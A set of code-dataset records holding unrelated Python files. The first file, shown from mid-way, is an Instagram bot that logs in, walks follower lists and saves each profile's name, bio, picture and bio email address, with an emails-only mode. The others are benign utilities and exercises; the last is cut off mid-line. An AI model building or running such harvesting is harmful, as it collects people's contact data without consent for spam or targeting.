'//div[@role=\"dialog\"]//ul/parent::div')))\n except TimeoutException:\n raise TimeoutException\n\n self.get_all_usernames(self.get_subscribers_count())\n\n def get_subscribers_count(self):\n soup = BeautifulSoup(self.driver.page_source, 'lxml')\n scraper = Scraper(False, self.driver)\n\n try:\n followers = soup.find_all('span', 'g47SY')[1].text\n followers = followers.replace(' ', '')\n if 'm' in followers:\n followers = followers.replace('m', '')\n followers = float(followers) * 1000000\n if 'k' in followers:\n followers = followers.replace('k', '')\n followers = float(followers) * 1000\n\n return float(str(scraper.get_followers(str(followers))))\n\n except AttributeError:\n return '0'\n except IndexError:\n return '0'\n\n def get_all_usernames(self, subscribers):\n try:\n soup = BeautifulSoup(self.driver.page_source, 'lxml')\n usernames_count = len(soup.find_all('a', 'FPmhX'))\n while usernames_count < subscribers - 10:\n element = self.driver.find_element_by_xpath('//div[@role=\"dialog\"]//ul/parent::div')\n self.driver.execute_script('arguments[0].scrollTop = arguments[0].scrollHeight', element)\n soup = BeautifulSoup(self.driver.page_source, 'lxml')\n usernames_count = len(soup.find_all('a', 'FPmhX'))\n\n usernames_count = soup.find_all('a', 'FPmhX')\n for username in usernames_count:\n self.driver.get('https://www.instagram.com/{}/'.format(username.string))\n try:\n WebDriverWait(self.driver, 60).until(\n EC.presence_of_element_located(\n (By.XPATH, '//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[1]/span')))\n except TimeoutException:\n raise TimeoutException\n\n scraper = Scraper(self.email_only, self.driver)\n scraper.scrape_profile()\n\n\n except AttributeError:\n pass\n\n\nclass Scraper():\n def __init__(self, email_only, driver):\n self.email_only = email_only\n self.driver = driver\n\n def has_email(self, soup):\n try:\n div = soup.find('div', '-vDIg')\n description = div.findChild('span').text\n email = re.findall(r'(\\w+@.+\\.\\w+)', description)\n if len(email) > 0:\n return True\n else:\n return False\n\n except AttributeError:\n return False\n\n def scrape_email(self, soup):\n try:\n div = soup.find('div', '-vDIg')\n description = div.findChild('span').text\n result = re.findall(r'(\\w+@.+\\.\\w+)', description)[0]\n return result\n except AttributeError:\n return ' '\n except IndexError:\n return ' '\n\n def scrape_profile(self):\n soup = BeautifulSoup(self.driver.page_source, 'lxml')\n if self.email_only:\n if self.has_email(soup):\n username = self.scrape_username(soup)\n posts = str(self.scrape_posts(soup)).replace(' ', '')\n following = self.scrape_following(soup)\n followers = self.scrape_subscribers(soup)\n full_name = self.scrape_name(soup)\n description = self.scrape_profile_description(soup)\n email = self.scrape_email(soup)\n pic = self.scrape_profile_picture(soup)\n subscribed_on_your_profile = self.subscribed_on_you(soup)\n you_subscribed = self.you_subscrided(soup)\n user = Users(username=username, posts=posts, followers=followers, following=following, name=full_name,\n description=description, email=email,\n subscribed_on_your_profile=subscribed_on_your_profile,\n you_subscribed=you_subscribed, picture=pic)\n user.save()\n else:\n username = self.scrape_username(soup)\n posts = str(self.scrape_posts(soup)).replace(' ', '')\n following = self.scrape_following(soup)\n followers = self.scrape_subscribers(soup)\n full_name = self.scrape_name(soup)\n description = self.scrape_profile_description(soup)\n email = self.scrape_email(soup)\n pic = self.scrape_profile_picture(soup)\n subscribed_on_your_profile = self.subscribed_on_you(soup)\n you_subscribed = self.you_subscrided(soup)\n user = Users(username=username, posts=posts, followers=followers, following=following, name=full_name,\n description=description, email=email, subscribed_on_your_profile=subscribed_on_your_profile,\n you_subscribed=you_subscribed, picture=pic)\n user.save()\n sleep(0.5)\n\n def scrape_username(self, soup):\n try:\n return soup.find('h2', '_7UhW9').string\n except AttributeError:\n try:\n sleep(1)\n return soup.find('h2', '_7UhW9').string\n except AttributeError:\n return 'None'\n\n def scrape_posts(self, soup):\n try:\n return soup.find_all('span', 'g47SY')[0].string\n except AttributeError:\n return '0'\n except IndexError:\n return '0'\n\n def scrape_subscribers(self, soup):\n try:\n return soup.find_all('span', 'g47SY')[1].text\n except AttributeError:\n return '0'\n except IndexError:\n return '0'\n\n def scrape_following(self, soup):\n try:\n return soup.find_all('span', 'g47SY')[2].text\n except AttributeError:\n return '0'\n except IndexError:\n return '0'\n\n def scrape_name(self, soup):\n try:\n return soup.find('h1', 'rhpdm').text\n except AttributeError:\n return ' '\n\n def scrape_profile_description(self, soup):\n try:\n div = soup.find('div', '-vDIg')\n return div.findChild('span').text\n except AttributeError:\n return ' '\n\n def scrape_profile_picture(self, soup):\n try:\n pic = soup.find('img', '_6q-tv')['src']\n if len(pic) < 250:\n return pic\n else:\n return ' '\n\n except AttributeError:\n raise Exception('imgERROR')\n\n def you_subscrided(self, soup):\n try:\n if soup.find('button', '-fzfL'):\n return 'Yes'\n else:\n return ' '\n except AttributeError:\n return ' '\n\n def subscribed_on_you(self, soup):\n try:\n if soup.find('button', '_5f5mN').string == 'Follow Back':\n return 'Yes'\n else:\n return ' '\n except AttributeError:\n return ' '\n\n def get_followers(self, followers):\n if 'm' in followers:\n followers = followers.replace('m', '').replace(' ', '')\n return str(int(followers * 1000000))\n\n elif 'k' in followers:\n followers = followers.replace('k', '').replace(' ', '')\n return str(int(followers * 1000))\n\n else:\n return followers.replace(',', '.')\n\n def get_following(self, following):\n if 'm' in following:\n following = following.replace('k', '').replace(' ', '')\n\n return str(int(following * 1000000))\n\n elif 'k' in following:\n following = following.replace('k', '').replace(' ', '')\n\n return str(int(following * 1000))\n\n else:\n return following.replace(',', '.')\n\n\ndef xpath_soup(element):\n components = []\n child = element if element.name else element.parent\n for parent in child.parents:\n siblings = parent.find_all(child.name, recursive=False)\n components.append(\n child.name if 1 == len(siblings) else '%s[%d]' % (\n child.name,\n next(i for i, s in enumerate(siblings, 1) if s is child)\n )\n )\n child = parent\n components.reverse()\n return '/%s' % '/'.join(components)\n\n\ndef main(profiles, private_only: False, business_only: False, email_only: False, proxy_port: None, proxy_host: '',\n login, password):\n scraper = Cliker(profiles, private_only, business_only, email_only, proxy_port, proxy_host)\n scraper.login(login, password)\n for profile in profiles:\n profile = profile.replace(' ', '')\n scraper.find_profile(profile)\n scraper.click_following()\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"scraper/scraper_engine/following_collector.py","file_name":"following_collector.py","file_ext":"py","file_size_in_byte":12620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"13995240","text":"from functools import partial\nfrom typing import List\n\nfrom pyqtgraph.Qt import QtCore, QtGui\n\nfrom pycontrol_homecage.utils import (TableCheckbox, cbox_set_item, cbox_update_options,\n null_resize)\n\n\nclass variables_table(QtGui.QTableWidget):\n \" Table that tracks what variables a mouse currently running in a task has\"\n\n def __init__(self, parent=None):\n super(QtGui.QTableWidget, self).__init__(1, 7, parent=parent)\n self.headers = ['Variable', 'Subject', 'Value', 'Persistent', 'Summary', 'Set', '']\n self.setHorizontalHeaderLabels(self.headers)\n self.horizontalHeader().setResizeMode(0, QtGui.QHeaderView.Stretch)\n self.horizontalHeader().setResizeMode(2, QtGui.QHeaderView.Stretch)\n self.horizontalHeader().setResizeMode(5, QtGui.QHeaderView.ResizeToContents)\n self.verticalHeader().setVisible(False)\n add_button = QtGui.QPushButton(' add ')\n self.setCellWidget(0, 5, add_button)\n self.n_variables = 0\n self.variable_names = []\n self.available_variables = []\n self.assigned = {v_name: [] for v_name in self.variable_names} # Which subjects have values assigned for each variable.\n self.subject_variable_names = {}\n\n def remove_variable(self, variable_n: int) -> None:\n self.removeRow(variable_n)\n self.n_variables -= 1\n self.update_available()\n null_resize(self)\n\n def reset(self):\n '''Clear all rows of table.'''\n for i in reversed(range(self.n_variables)):\n self.removeRow(i)\n self.n_variables = 0\n self.assigned = {v_name: [] for v_name in self.variable_names} \n\n def add_variable(self, var_dict: dict = None) -> None:\n\n '''Add a row to the variables table.'''\n variable_cbox = QtGui.QComboBox()\n variable_cbox.activated.connect(self.update_available)\n subject_cbox = QtGui.QComboBox()\n subject_cbox.activated.connect(self.update_available)\n persistent = TableCheckbox()\n summary = TableCheckbox()\n set_var = TableCheckbox()\n \n set_var.checkbox.stateChanged.connect(partial(self.setVar_changed, self.n_variables))\n persistent.checkbox.stateChanged.connect(partial(self.persistent_changed, self.n_variables))\n remove_button = QtGui.QPushButton('remove')\n ind = QtCore.QPersistentModelIndex(self.model().index(self.n_variables, 2))\n remove_button.clicked.connect(lambda: self.remove_variable(ind.row()))\n add_button = QtGui.QPushButton(' add ')\n add_button.clicked.connect(self.add_variable)\n self.insertRow(self.n_variables+1)\n self.setCellWidget(self.n_variables ,0, variable_cbox)\n self.setCellWidget(self.n_variables ,1, subject_cbox)\n self.setCellWidget(self.n_variables ,3, persistent)\n self.setCellWidget(self.n_variables ,4, summary)\n self.setCellWidget(self.n_variables ,5, set_var)\n self.setCellWidget(self.n_variables ,6, remove_button)\n self.setCellWidget(self.n_variables+1,6, add_button)\n if var_dict: # Set cell values from provided dictionary.\n variable_cbox.addItems([var_dict['name']])\n subject_cbox.addItems([var_dict['subject']])\n value_item = QtGui.QTableWidgetItem()\n value_item.setText(var_dict['value'])\n self.setItem(self.n_variables, 2, value_item)\n persistent.setChecked(var_dict['persistent'])\n summary.setChecked(var_dict['summary'])\n set_var.setChecked(var_dict['set'])\n else:\n variable_cbox.addItems(['select variable']+self.available_variables)\n if self.n_variables > 0: # Set variable to previous variable if available.\n v_name = str(self.cellWidget(self.n_variables-1, 0).currentText())\n if v_name in self.available_variables:\n cbox_set_item(variable_cbox, v_name)\n subject_cbox.addItems(self.available_subjects(v_name))\n self.n_variables += 1\n self.update_available()\n null_resize(self)\n\n def persistent_changed(self, row: int) -> None:\n \"\"\" A variables cannot be both persistent and set\"\"\"\n # print(\"updateing\",row)\n self.cellWidget(row, 5).setChecked(False)\n self.item(row, 2).setText(\"auto\")\n\n def setVar_changed(self, row: int) -> None:\n self.cellWidget(row, 3).setChecked(False)\n\n def update_available(self, i=None):\n # Find out what variable-subject combinations already assigned.\n self.assigned = {v_name: [] for v_name in self.variable_names}\n\n # to maintain consistency with main pycontrol, the way this works\n # is by setting variables assigned that\n for v_name in self.variable_names:\n for subject, vars_ in self.subject_variable_names.items():\n\n if v_name not in vars_:\n self.assigned[v_name].append(subject)\n\n # print(self.assigned)\n for v in range(self.n_variables):\n v_name = self.cellWidget(v, 0).currentText()\n s_name = self.cellWidget(v, 1).currentText()\n if s_name and s_name not in self.subjects_in_group + ['all']:\n cbox_set_item(self.cellWidget(v, 1), '', insert=True)\n continue\n if v_name != 'select variable' and s_name:\n self.assigned[v_name].append(s_name)\n # Update the variables available:\n fully_asigned_variables = [v_n for v_n in self.assigned.keys()\n if 'all' in self.assigned[v_n]]\n if self.subjects_in_group:\n fully_asigned_variables += [v_n for v_n in self.assigned.keys()\n if set(self.assigned[v_n]) == set(self.subjects_in_group)]\n self.available_variables = sorted(list(\n set(self.variable_names) - set(fully_asigned_variables)), key=str.lower)\n # Update the available options in the variable and subject comboboxes.\n\n for v in range(self.n_variables):\n v_name = self.cellWidget(v, 0).currentText()\n s_name = self.cellWidget(v, 1).currentText()\n cbox_update_options(self.cellWidget(v, 0), self.available_variables)\n if v_name != 'select variable':\n # If variable has no subjects assigned, set subjects to 'all'.\n if not self.assigned[v_name]:\n self.cellWidget(v, 1).addItems(['all'])\n self.assigned[v_name] = ['all']\n self.available_variables.remove(v_name)\n cbox_update_options(self.cellWidget(v, 1), self.available_subjects(v_name, s_name))\n\n def set_available_subjects(self, subjects: List[str]):\n self.subjects_in_group = subjects\n\n def set_variable_names(self, variable_names: List[str]):\n \"\"\" \"\"\"\n if not self.variable_names:\n self.variable_names = variable_names\n else:\n # print(self.variable_names,variable_names)\n self.variable_names.extend(variable_names)\n self.variable_names = list(set(self.variable_names))\n\n def set_variable_names_by_subject(self, subject: str, variable_names: List[str]) -> None:\n \"\"\" Allow tracking of which subject has which variables available\n to them in principle\n \"\"\"\n self.subject_variable_names[subject] = variable_names\n\n def available_subjects(self, v_name, s_name=None):\n '''Return sorted list of the subjects that are available for selection\n for the specified variable v_name given that subject s_name is already\n selected.'''\n if (not self.assigned[v_name]) or self.assigned[v_name] == [s_name]:\n available_subjects = ['all'] + sorted(self.subjects_in_group)\n else:\n available_subjects = sorted(list(set(self.subjects_in_group) -\n set(self.assigned[v_name])))\n return available_subjects\n\n def variables_list(self):\n '''Return the variables table contents as a list of dictionaries.'''\n return [{'name' : str(self.cellWidget(v, 0).currentText()),\n 'subject' : str(self.cellWidget(v, 1).currentText()),\n 'value' : str(self.item(v, 2).text()) if self.item(v, 2) else '',\n 'persistent': self.cellWidget(v, 3).isChecked(),\n 'summary' : self.cellWidget(v, 4).isChecked(),\n 'set' : self.cellWidget(v, 5).isChecked()}\n for v in range(self.n_variables)]\n","sub_path":"build/lib/pycontrol_homecage/tables/variables_table.py","file_name":"variables_table.py","file_ext":"py","file_size_in_byte":8646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"138740634","text":"\"\"\"\nThis file may not be shared/redistributed without permission. Please read copyright notice in the git repo. If this file contains other copyright notices disregard this text.\n\"\"\"\nimport os\nimport numpy as np\n\n\"\"\"\nUsing the plotter:\n\nCall it from the command line, and supply it with logdirs to experiments.\nSuppose you ran an experiment with name 'test', and you ran 'test' for 10 \nrandom seeds. The runner code stored it in the directory structure\n\n data\n L test_EnvName_DateTime\n L 0\n L log.txt\n L params.json\n L 1\n L log.txt\n L params.json\n .\n .\n .\n L 9\n L log.txt\n L params.json\n\nTo plot learning curves from the experiment, averaged over all random\nseeds, call\n\n python lmpc_plot.py data/test_EnvName_DateTime --value AverageReturn\n\nand voila. To see a different statistics, change what you put in for\nthe keyword --value. You can also enter /multiple/ values, and it will \nmake all of them in order.\n\n\nSuppose you ran two experiments: 'test1' and 'test2'. In 'test2' you tried\na different set of hyperparameters from 'test1', and now you would like \nto compare them -- see their learning curves side-by-side. Just call\n\n python lmpc_plot.py data/test1 data/test2\n\nand it will plot them both! They will be given titles in the legend according\nto their exp_name parameters. If you want to use custom legend titles, use\nthe --legend flag and then provide a title for each logdir.\n\n\"\"\"\n\ndef plot_data(data, y=\"accumulated_reward\", x=\"Episode\", ci=95, estimator='mean', **kwargs):\n import seaborn as sns\n import matplotlib.pyplot as plt\n import pandas as pd\n if isinstance(data, list): # is this correct even?\n data = pd.concat(data, ignore_index=True,axis=0)\n plt.figure(figsize=(12, 6))\n sns.set(style=\"darkgrid\", font_scale=1.5)\n lp = sns.lineplot(data=data, x=x, y=y, hue=\"Condition\", ci=ci, estimator=estimator, **kwargs)\n plt.legend(loc='best') #.set_draggable(True)\n\ndef existing_runs(experiment):\n nex = 0\n for root, dir, files in os.walk(experiment):\n if 'log.txt' in files:\n nex += 1\n return nex\n\ndef _get_most_recent_log_dir(fpath):\n files = [os.path.basename(root) for root, dir, files in os.walk(fpath) if 'log.txt' in files]\n return sorted(files, key=lambda file: os.path.basename(file))[-1] if len(files) > 0 else None\n\ndef get_datasets(fpath, x, condition=None, smoothing_window=None, resample_key=None, resample_ticks=None, only_most_recent=False):\n import pandas as pd\n unit = 0\n if condition is None:\n condition = fpath\n datasets = []\n\n if only_most_recent:\n most_recent = _get_most_recent_log_dir(fpath)\n\n for root, dir, files in os.walk(fpath):\n print(files)\n if 'log.txt' in files:\n if only_most_recent and most_recent is not None and os.path.basename(root) != most_recent: # Skip this log.\n continue\n json = os.path.join(root, 'params.json')\n if os.path.exists(json):\n with open(json) as f:\n param_path = open(json)\n params = json.load(param_path)\n # exp_name = params['exp_name']\n\n log_path = os.path.join(root, 'log.txt')\n if os.stat(log_path).st_size == 0:\n print(\"Bad plot file\", log_path, \"size is zero. Skipping\")\n continue\n experiment_data = pd.read_table(log_path)\n\n if smoothing_window:\n ed_x = experiment_data[x]\n experiment_data = experiment_data.rolling(smoothing_window,min_periods=1).mean()\n experiment_data[x] = ed_x\n\n experiment_data.insert(\n len(experiment_data.columns),\n 'Unit',\n unit\n )\n experiment_data.insert(\n len(experiment_data.columns),\n 'Condition',\n condition)\n\n datasets.append(experiment_data)\n unit += 1\n\n nc = f\"({unit}x)\"+condition[condition.rfind(\"/\")+1:]\n for i, d in enumerate(datasets):\n datasets[i] = d.assign(Condition=lambda x: nc)\n\n if resample_key is not None:\n nmax = 0\n vmax = -np.inf\n vmin = np.inf\n for d in datasets:\n nmax = max( d.shape[0], nmax)\n vmax = max(d[resample_key].max(), vmax)\n vmin = min(d[resample_key].min(), vmin)\n if resample_ticks is not None:\n nmax = min(resample_ticks, nmax)\n\n new_datasets = []\n tnew = np.linspace(vmin + 1e-6, vmax - 1e-6, nmax)\n for d in datasets:\n nd = {}\n cols = d.columns.tolist()\n for c in cols:\n if c == resample_key:\n y = tnew\n elif d[c].dtype == 'O':\n y = [ d[c][0] ] * len(tnew)\n else:\n y = np.interp(tnew, d[resample_key].tolist(), d[c], left=np.nan, right=np.nan)\n y = y.astype(d[c].dtype)\n nd[c] = y\n\n ndata = pd.DataFrame(nd)\n ndata = ndata.dropna()\n new_datasets.append(ndata)\n datasets = new_datasets\n return datasets\n\n\ndef _load_data(experiments, legends=None, smoothing_window=None, resample_ticks=None,\n x_key=\"Episode\",\n only_most_recent=False):\n ensure_list = lambda x: x if isinstance(x, list) else [x]\n experiments = ensure_list(experiments)\n if legends is None:\n legends = experiments\n legends = ensure_list(legends)\n\n data = []\n for logdir, legend_title in zip(experiments, legends):\n resample_key = x_key if resample_ticks is not None else None\n data += get_datasets(logdir, x=x_key, condition=legend_title, smoothing_window=smoothing_window, resample_key=resample_key, resample_ticks=resample_ticks,\n only_most_recent=only_most_recent)\n return data\n\ndef main_plot(experiments, legends=None, smoothing_window=None, resample_ticks=None,\n x_key=\"Episode\",\n y_key='Accumulated Reward',\n no_shading=False,\n **kwargs):\n if no_shading:\n kwargs['units'] = 'Unit'\n kwargs['estimator'] = None\n\n ensure_list = lambda x: x if isinstance(x, list) else [x]\n experiments = ensure_list(experiments)\n\n if legends is None:\n legends = experiments\n legends = ensure_list(legends)\n\n data = []\n for logdir, legend_title in zip(experiments, legends):\n resample_key = x_key if resample_ticks is not None else None\n data += get_datasets(logdir, x=x_key, condition=legend_title, smoothing_window=smoothing_window, resample_key=resample_key, resample_ticks=resample_ticks)\n\n plot_data(data, y=y_key, x=x_key, **kwargs)\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('logdir', nargs='*')\n parser.add_argument('--legend', nargs='*')\n parser.add_argument('--value', default='AverageReturn', nargs='*')\n parser.add_argument('--title', default=\"please specify title\", help=\"The title to show\")\n parser.add_argument('--pdf_name', default=None, help=\"Name of pdf\")\n\n args = parser.parse_args()\n main_plot(args.logdir, args.legend, args.value, title=args.title)\n\nif __name__ == \"__main__\":\n main()\n\n\n#### TRAJECTORY PLOTTING HERE ####\ndef plot_trajectory(trajectory, env=None, xkeys=None, ukeys=None):\n # get labels, etc.\n if xkeys is None:\n xkeys = [i for i in range(trajectory.state.shape[1])]\n\n if ukeys is None: # all\n ukeys = [i for i in range(trajectory.action.shape[1])]\n import seaborn as sns\n import matplotlib.pyplot as plt\n import pandas as pd\n plt.figure(figsize=(12, 6))\n sns.set(style=\"darkgrid\", font_scale=1.5)\n def fp(time, X, keys, labels):\n for i, k in enumerate(keys):\n label = labels[k] if labels is not None else None\n lp = sns.lineplot(x=time, y=X[:,k], label=label)\n\n time = trajectory.time.squeeze()\n fp(time, trajectory.state, xkeys, labels=env.state_labels if env is not None else None)\n fp(time[:-1], trajectory.action, ukeys, labels=env.action_labels if env is not None else None)\n\n if env is not None:\n plt.legend()\n","sub_path":"irlc/utils/irlc_plot.py","file_name":"irlc_plot.py","file_ext":"py","file_size_in_byte":8330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"282154544","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nimport statistics\n\nN = int(input())\nele = list(map(int, input().rstrip().split()))\nfre = list(map(int, input().rstrip().split()))\narr = []\n\nfor i in range(N):\n arr.extend([ele[i]]*fre[i])\n\narr.sort()\nmidpoint = sum(fre)//2\nq1 = statistics.median(arr[:midpoint])\nq3 = statistics.median(arr[-midpoint:])\n\nprint('%.1f' % (q3-q1))\n","sub_path":"10 Days of Statistics/day01_interquartile_range.py","file_name":"day01_interquartile_range.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"67032567","text":"\"\"\"\r\n\n\nGiven a square list ( _n_ * _n_ size) implement a function that returns a new\nlist containing two lists equal to the two diagonals, in the following order:\n\n diagonal 1 = from upper-left to lower-right corner\n diagonal 2 = from upper-right to lower-left corner\n\n### Examples\n\n get_diagonals([ [1, 2], [3, 4] ]) ➞ [ [1, 4], [2, 3] ]\n \n get_diagonals([ [\"a\", \"b\", \"c\"], [\"d\", \"e\", \"f\"], [\"g\", \"h\", \"i\"] ]) ➞ [ [\"a\", \"e\", \"i\"], [\"c\", \"e\", \"g\"] ]\n \n get_diagonals([ [True] ]) ➞ [ [True], [True] ]\n\n### Notes\n\n * Your function must also work with single elements or empty lists.\n * Try to build both diagonals with a single loop.\n\n\"\"\"\r\n\nimport numpy as np\ndef get_diagonals(lst):\n if not lst: \n return [[],[]]\n \n lst = np.array(lst)\n a = list(lst.diagonal()) #Converted back to list due to numpy bug\n b = list(np.flipud(lst).diagonal()[::-1])\n \n return [a,b]\n\n","sub_path":"LQgpGFMK9t9MELvph_2.py","file_name":"LQgpGFMK9t9MELvph_2.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"285224183","text":"# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT license.\n\n\"\"\"\ntf2onnx.rewriter.rnn_unit_base - lstm support\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport numpy as np\nfrom onnx import onnx_pb\nfrom tf2onnx import utils\nfrom tf2onnx.rewriter.rnn_utils import get_pattern, RnnProperties, \\\n check_is_timemajor_transpose, REWRITER_RESULT\nfrom tf2onnx.graph_matcher import OpTypePattern, GraphMatcher # pylint: disable=unused-import\n\n\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(\"tf2onnx.rewriter.rnn_unit_writer_base\")\n\n# pylint: disable=invalid-name,unused-argument,missing-docstring\n\n# dynamic_rnn or bidirectional_dynamic_rnn related logic will be mapped to this base class.\nclass UnitRewriterBase(object):\n def __init__(self, g):\n self.g = g\n self.all_nodes = self.g.get_nodes()\n # checker signature : func_name(enter_target_node_input_id, identity_consumers, match)\n # exit connector signature: func_name(rnn_node, exit_node, rnn_props)\n self.switch_checkers = {}\n\n def run(self, unit_type):\n \"\"\"\n main procedures:\n 1 use cell op pattern to find cell >> the found cell is the start pointer of the procedures below\n 2 find needed info from tensorflow graph:\n 1 rnn scope name\n 2 input_x\n 3 weight\n 4 sequence node\n 5 initializer\n 6 state output & hidden output\n 3 process found info according to ONNX requirement\n\n remember: op pattern and scope name are useful\n they are used to get needed info from tensorflow graph\n raw found info need to be formatted according to ONNX requirement\n \"\"\"\n # allow_reorder must be true. because LSTMCell and BasicLSTMCell's call function\n # are defining the calculation with different orders. Then we can share the same\n # pattern.\n cell_pattern = get_pattern(unit_type)\n matcher = GraphMatcher(cell_pattern, allow_reorder=True)\n match_results = list(matcher.match_ops(self.g.get_nodes()))\n\n if match_results:\n for match in match_results:\n self.run_single_match(match)\n\n self.g.delete_unused_nodes(self.g.output_names)\n self.g.update_proto()\n self.print_step(\"finish handling\")\n\n return self.g.get_nodes()\n\n def run_single_match(self, match):\n \"\"\"\n methods to get needed info from tf graph:\n 1 input_x: specific node in found cell, then trace TensorArrayReadV >..>input of \"TensorArrayScatterV\",\n if \"Transpose\" found under rnn scope, then input of \"Transpose\" is \"input_x\"\n 2 weight: specific node in cell computation graph and specific op pattern as input_x\n 3 sequence node: \"Identity\" op with name \"sequence_length\", the name is hard code in tensorflow code\n 4 state initializer: \"LoopCond\" and then specific op pattern >> LoopCond > Switch > Switch usage checker\n 5 hidden output and state output: find switch and use switch checker to distinguish different switch nodes\n\n 6 scope name of rnn and gru/lstm cell: specific node in cell computation graph,\n and use found convention in tensorflow code to split name of node to get needed scooe name\n\n most found info is stored in \"rnn_props\"\n \"\"\"\n log.debug(\"=========================\")\n self.print_step(\"start handling a new potential rnn cell\")\n self.all_nodes = self.g.get_nodes()\n # FIXME:\n # pylint: disable=assignment-from-none,assignment-from-no-return\n\n # when bi-directional, node in while will be rnnxx/fw/fw/while/... >> scope name is rnnxx/fw/fw\n # when single direction, node in while will be rnnxx/while/... >> scope name is rnnxx\n # and rnnxx can be assigned by users but not \"fw\", though maybe \"FW\" in another tf version\n rnn_scope_name = self.get_rnn_scope_name(match)\n if not rnn_scope_name:\n log.debug(\"unable to find rnn scope name, skip\")\n return REWRITER_RESULT.SKIP\n log.debug(\"rnn scope name is %s\", rnn_scope_name)\n\n self.print_step(\"get_weight_and_bias starts\")\n rnn_weights = self.get_weight_and_bias(match)\n if not rnn_weights:\n log.debug(\"rnn weights check failed, skip\")\n return REWRITER_RESULT.SKIP\n\n rnn_props = RnnProperties()\n res = self.get_var_initializers(match, rnn_props, rnn_scope_name)\n if not res or not rnn_props.var_initializers.keys:\n log.debug(\"no cell variable initializers found, skip\")\n return REWRITER_RESULT.SKIP\n\n seq_len_input_node = self.find_sequence_length_node(rnn_scope_name)\n input_filter = self.get_rnn_input_blacklist(rnn_weights, rnn_props)\n if seq_len_input_node:\n input_filter.append(seq_len_input_node)\n\n self.find_inputs(rnn_scope_name, rnn_props, match, input_filter)\n if not rnn_props.is_valid():\n log.debug(\"rnn properties are not valid, skip\")\n return REWRITER_RESULT.SKIP\n\n if not self.process_input_x(rnn_props, rnn_scope_name):\n log.debug(\"rnn input x not found, skip\")\n return REWRITER_RESULT.SKIP\n\n self.print_step(\"process the weights/bias/ft_bias, to fit onnx weights/bias requirements\")\n self.process_weights_and_bias(rnn_weights, rnn_props)\n\n _, batch_size_node = self.process_seq_length(rnn_props, seq_len_input_node)\n rnn_props.batch_size_node = batch_size_node\n\n self.process_var_init_nodes(rnn_props)\n\n self.print_step(\"start to build new rnn node\")\n\n rnn_props.activation = self.get_rnn_activation(match)\n\n rnn_node = self.create_rnn_node(rnn_props)\n self.all_nodes.append(rnn_node)\n\n self.print_step(\"start to handle outputs\")\n # format of ONNX output is different with tf\n self.process_outputs(match, rnn_node, rnn_props, rnn_scope_name)\n # FIXME:\n # pylint: enable=assignment-from-none,assignment-from-no-return\n return REWRITER_RESULT.OK\n\n# find needed info from graph\n def get_rnn_scope_name(self, match):\n pass\n\n def get_cell_scope_name(self, match):\n return None\n\n @staticmethod\n def get_rnn_activation(match):\n return None\n\n def get_weight_and_bias(self, match):\n pass\n\n def get_var_initializers(self, match, rnn_props, rnn_scope_name):\n \"\"\"\n initializer op can be found by tracing from switch mode. while rnn has multiple switch nodes,\n so have to discriminate them by a check.\n switch nodes can be found by tracing LoopCond\n \"\"\"\n loop_cond_op = None\n for n in self.g.get_nodes():\n if n.type == 'LoopCond' and n.name.startswith(rnn_scope_name):\n if not loop_cond_op:\n loop_cond_op = n\n else:\n log.debug(\"only a LoopCond is expected, rnn scope name:%s\", rnn_scope_name)\n return None\n\n if loop_cond_op is None:\n log.debug(\"No LoopCond op is found, skip\")\n return None\n\n switch_nodes = self.g.find_output_consumers(loop_cond_op.output[0])\n for n in switch_nodes:\n if n.type != 'Switch':\n raise ValueError(\"LoopCond's output node should be followed with a Switch node\")\n\n for var_name, funcs in self.switch_checkers.items():\n var_checker = funcs[0]\n if not funcs[2]:\n continue\n enter_target_input_id = self.check_switch_by_usage_pattern(n, match, var_checker)\n if enter_target_input_id:\n log.debug(\"found initializer node for \" + var_name + \": \" + enter_target_input_id)\n rnn_props.var_initializers[var_name] = enter_target_input_id\n break\n return rnn_props.var_initializers\n\n def find_sequence_length_node(self, rnn_scope_name):\n # \"sequence_length\" under current rnn scope is the seq len node (if there is).\n # this is hardcoded in dynamic_rnn().\n\n seq_len_nodes = []\n for n in self.g.get_nodes():\n if not n.name.startswith(rnn_scope_name):\n continue\n\n if n.name.endswith(\"sequence_length\") and n.type == \"Identity\":\n log.debug(\"find non-const sequence length node\")\n elif \"CheckSeqLen\" in n.name and n.is_const():\n # if seq length is const, the node might be const folded,\n # so we check this way.\n log.debug(\"find const sequence length node\")\n else:\n continue\n seq_len_nodes.append(n)\n\n seq_len_node_cnt = len(seq_len_nodes)\n if seq_len_node_cnt == 0:\n return None\n if seq_len_node_cnt == 1:\n seq_len_node = seq_len_nodes[0]\n if seq_len_node.is_const():\n return seq_len_node\n # input of the \"identity\" node may be a \"cast\"\n # if so, then we have to keep it\n # sentence \"math_ops.to_int32(sequence_length)\" in tf results in the \"cast\" op\n if seq_len_node.inputs[0].type == \"Cast\":\n cast_node = seq_len_node.inputs[0]\n if not cast_node.inputs[0].name.startswith(rnn_scope_name):\n return seq_len_node.inputs[0]\n raise ValueError(\"sequence length node should be outside of rnn scope\")\n if not seq_len_node.inputs[0].name.startswith(rnn_scope_name):\n return seq_len_node.inputs[0]\n raise ValueError(\"sequence length node should be outside of rnn scope\")\n raise ValueError(\"there are more sequence length nodes than expected\")\n\n def get_rnn_input_blacklist(self, rnn_weights, rnn_props):\n var_init_nodes = []\n for _, init_input_id in rnn_props.var_initializers.items():\n init_node = self.g.get_node_by_output(init_input_id)\n var_init_nodes.append(init_node)\n\n # weight/bias inputs, and c/h initializers are dynamic_rnn/LSTMCell's parameters.\n # we will use them to filter out the dynamic_rnn's input tensor.\n blacklist_inputs = [rnn_weights.kernel.node, rnn_weights.bias.node, rnn_weights.forget_bias.node]\n 